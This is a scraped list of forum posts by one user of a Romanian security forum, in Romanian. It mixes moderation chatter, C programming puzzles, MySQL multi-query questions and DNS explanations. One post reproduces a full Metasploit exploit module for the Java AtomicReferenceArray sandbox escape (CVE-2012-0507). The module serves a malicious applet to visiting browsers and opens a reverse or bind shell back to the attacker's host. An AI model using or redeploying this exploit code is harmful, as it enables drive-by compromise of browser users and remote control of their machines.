-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Bum: http://i44.tinypic.com/j65pqx.png Si probabil e multe altele.
-
Nu am mai vazut de ani creatii proprii ale utilizatorilor... Deci o sectiune ar fi inutila. Posteaza, vedem dupa ce si cum.
-
User-ul "100" de aici e carder, mi-a zis direct. Zicea ca are forum de CC si mi-a propus sa isi faca reclama, daca are voie. Eu nu m-am stresat, dar ideea era ca astfel, discutiile despre carduri si alte cacaturi se vor putea posta pe forumul lui, iar noi am mai scapa de ei si ne-ar lasa in voia noastra. Voi ce ziceti? Luni fac la mine la facultate o prezentare despre securitatea aplicatiilor web (cacaturi de baza) iar dupa, o sa imi fac ceva timp de RST, si vedem exact ce facem. Apoi, ramanem cu RST market doar pentru cei cu 50+ posturi?
-
In sfarsit... Bine ai venit.
-
Legat de posturile de la RST Market, cand vad ceva aiurea, dau Delete, dar cand sunt multe nu sunt atent si e posibil sa mai fi acceptat eu vreo 2-3 naspa, dar le citesc de la cap la coada de obicei. In fine, eu cred ca ar fi bine sa inchidem un timp RST Market, e posibil sa fie lume cautata din cauza rahaturilor de pe acolo... //fraza editata (nu are legatura cu subiectul in cauza)// Nu o sa am timp nici in viitorul apropiat, sper sa imi fac pe viitor, sa mai fac cate ceva... Sa imi ziceti si mie daca vreti sa schimbati ceva.
-
"Thank you for sending this to Yahoo!. It has been passed along to the correct teams to investigate. Should there be question, we will contact you here. If a fix is required, we will again contact you and ask that you see the issue as resolved." Cateva ore mai tarziu: "A fix has been put in place and we ask that you see this issue as resolved." Mi-a facut placere, expl0iter. Faceti ce vreti cu XSS-urile de Yahoo, dar nu pe RST.
-
Am comandat eu, dar nu eram in tara. Era o "promotie", transport gratuit la multe produse, free doar 30 de zile, apoi dezactivat pentru ca iti lua de pe card 80 de dolari (pe un an). Nu stiu cum e pentru Romania.
-
Ban permanent. Si am trimis mail la Yahoo. Daca nu ii convine cuiva, _|_.
-
In sfarsit cineva pasionat de programare, bun venit.
-
Hai sa mergem diseara pe la el.
-
Pai ba, zicea co4ie ca venim la tine sa bem sambata, de-aia am crezut.
-
Pentru ca pe Windows nu o sa mearga, e if(c != '\r') Iar '\r' == 13 si '\n' == 10, e acelasi lucru.
-
Ok ar fi cam asa: #include <stdio.h> void f(unsigned char c) { if(c != 0xD) { f(getch()); printf("%c", c); } } int main() { f(getch()); return 0; } Pe Windows putea sa fie 10, dar am incercat inainte, si e 13.
-
Nu, intrebarea e gandita, fara vectori, pointeri sau clase (e "C" nu "C++"). Raspunsurile pe PM.
-
[h=1]Java AtomicReferenceArray Type Violation Vulnerability[/h] ### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize( info = {} ) super( update_info( info, 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', 'Description' => %q{ This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', # metasploit module 'juan vazquez', # metasploit module 'egypt' # special assistance ], 'References' => [ ['CVE', '2012-0507'], ['BID', '52161'], ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 14 2012' )) end def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri( cli, request ) data = "" host = "" port = "" peer = "#{cli.peerhost}:#{cli.peerport}" if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status("#{peer} - Sending #{self.name}") payload = regenerate_payload( cli ) if not payload print_error("#{peer} - Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] jar = payload.encoded host = datastore['LHOST'] port = datastore['LPORT'] vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end else # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe if data print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status( "#{peer} - sending jar..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) jar_name = rand_text_alpha(rand(6)+3) + ".jar" html = "<html><head></head>" html += "<body>" html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "<param name=\"lport\" value=\"#{port}\"/>" if port html += "</applet></body></html>" return html end def generate_jar() return @jar_data end end Sursa: Java AtomicReferenceArray Type Violation Vulnerability
-
Exista programe care pe baza unor semnaturi iti arata ce posibilitati ar putea fi. Java? Asta e altceva, are cumva extensia .jar sau .class? Daca e .exe sau .dll, vezi: PEiD Vezi si PE Explorer si multe alte programe utile...
-
Ia ban, rapid si usor.
-
Chestia aia e valabila numai daca te conectezi folosind JDBC la MySQL, iti permite sa folosesti multiple queries, dar MySQL nu te opreste sa executi mai multe query-uri, e pentru driver-ul JDBC nu pentru MySQL. A se vedea si: http://se2.php.net/manual/en/mysqli.multi-query.php
-
Mda.. mysql> select table_name from tables limit 1; select column_name from columns limit 1; +----------------+ | table_name | +----------------+ | CHARACTER_SETS | +----------------+ 1 row in set (0.00 sec) +--------------------+ | column_name | +--------------------+ | CHARACTER_SET_NAME | +--------------------+ 1 row in set (0.07 sec) mysql> Iar: PHP: mysql_query - Manual resource mysql_query ( string $query [, resource $link_identifier = NULL ] ) mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier.
-
Hackerii pot "DECAPITA" internetul peste cateva zile
Nytro replied to sicilianul's topic in Stiri securitate
Browser-ul face request catre serverul DNS al ISP-ului. Scurt. Daca nu e gasit domeniu, se face cautarea mai departe in ierarhie pana ajunge la un server root. Browser-ul nu are nicio treaba cu serverul root, nu stie "cine" este, request-urile sunt forwardate intre serverele DNS.- 15 replies
-
- amenintare
- hackeri
-
(and 3 more)
Tagged with:
-
Poate daca ati citi si voi despre SQL (Structured Query Language) si despre un SGBDR (Sistem de Gestiune al Bazelor de Date Relationale) nu ati mai pune intrebari negandite.
-
Hackerii pot "DECAPITA" internetul peste cateva zile
Nytro replied to sicilianul's topic in Stiri securitate
1) Serverele Root DNS (globale) sunt publice, deci nu au obtinut nimic 2) Nu vad legatura cu "hackingul" 3) Serverele nu sunt ale lui Vasile, foarte probabil se da DROP la toate pachetele care nu vin de la sub-servere DNS, probabil au si ele un firewall hardware 4) Tu cand intri pe RST, rezolvare DNS nu se face pe un server DNS global, deci utilizatorii nu vor avea nicio problema 5) Dureaza pana sa se propage domeniile noi, insa cele existente se afla pe alte servere DNS care tin de ISP, deci nu vor fi probleme Asa cum ma gandeam, copii copaci, in cel mai rau caz incetinesc propagarea noilor domenii (inregistrate atunci), dar se vede ca nu ii duce capul.- 15 replies
-
- amenintare
- hackeri
-
(and 3 more)
Tagged with:
-
Cea mai buna meserie. Hackerii pot face sute de mii de dolari
Nytro replied to a topic in Stiri securitate
Ba, voi ganditi ce spuneti? Cum cacat faceti voi 250k dolari cu o vulnerabilitate? Poate sa ai cumva un RCE in sshd sa poti avea acces la toate serverele pe SSH din lume, sau in Apache sa poti executa cod pe 50% din web serverele din lume... Si uite ca nu vad nimic despre XSS si SQLI... Dar vai, nu dau guvernele 100k pentru un SQLI? Nu considera "hacking" un SQLI? Te mai baga si la inchisoare pentru unul? -
E de acum 3 ani, nu cred ca mai e "util" DESI Loader-ul e un ActiveX care nu cred ca e foarte detectat.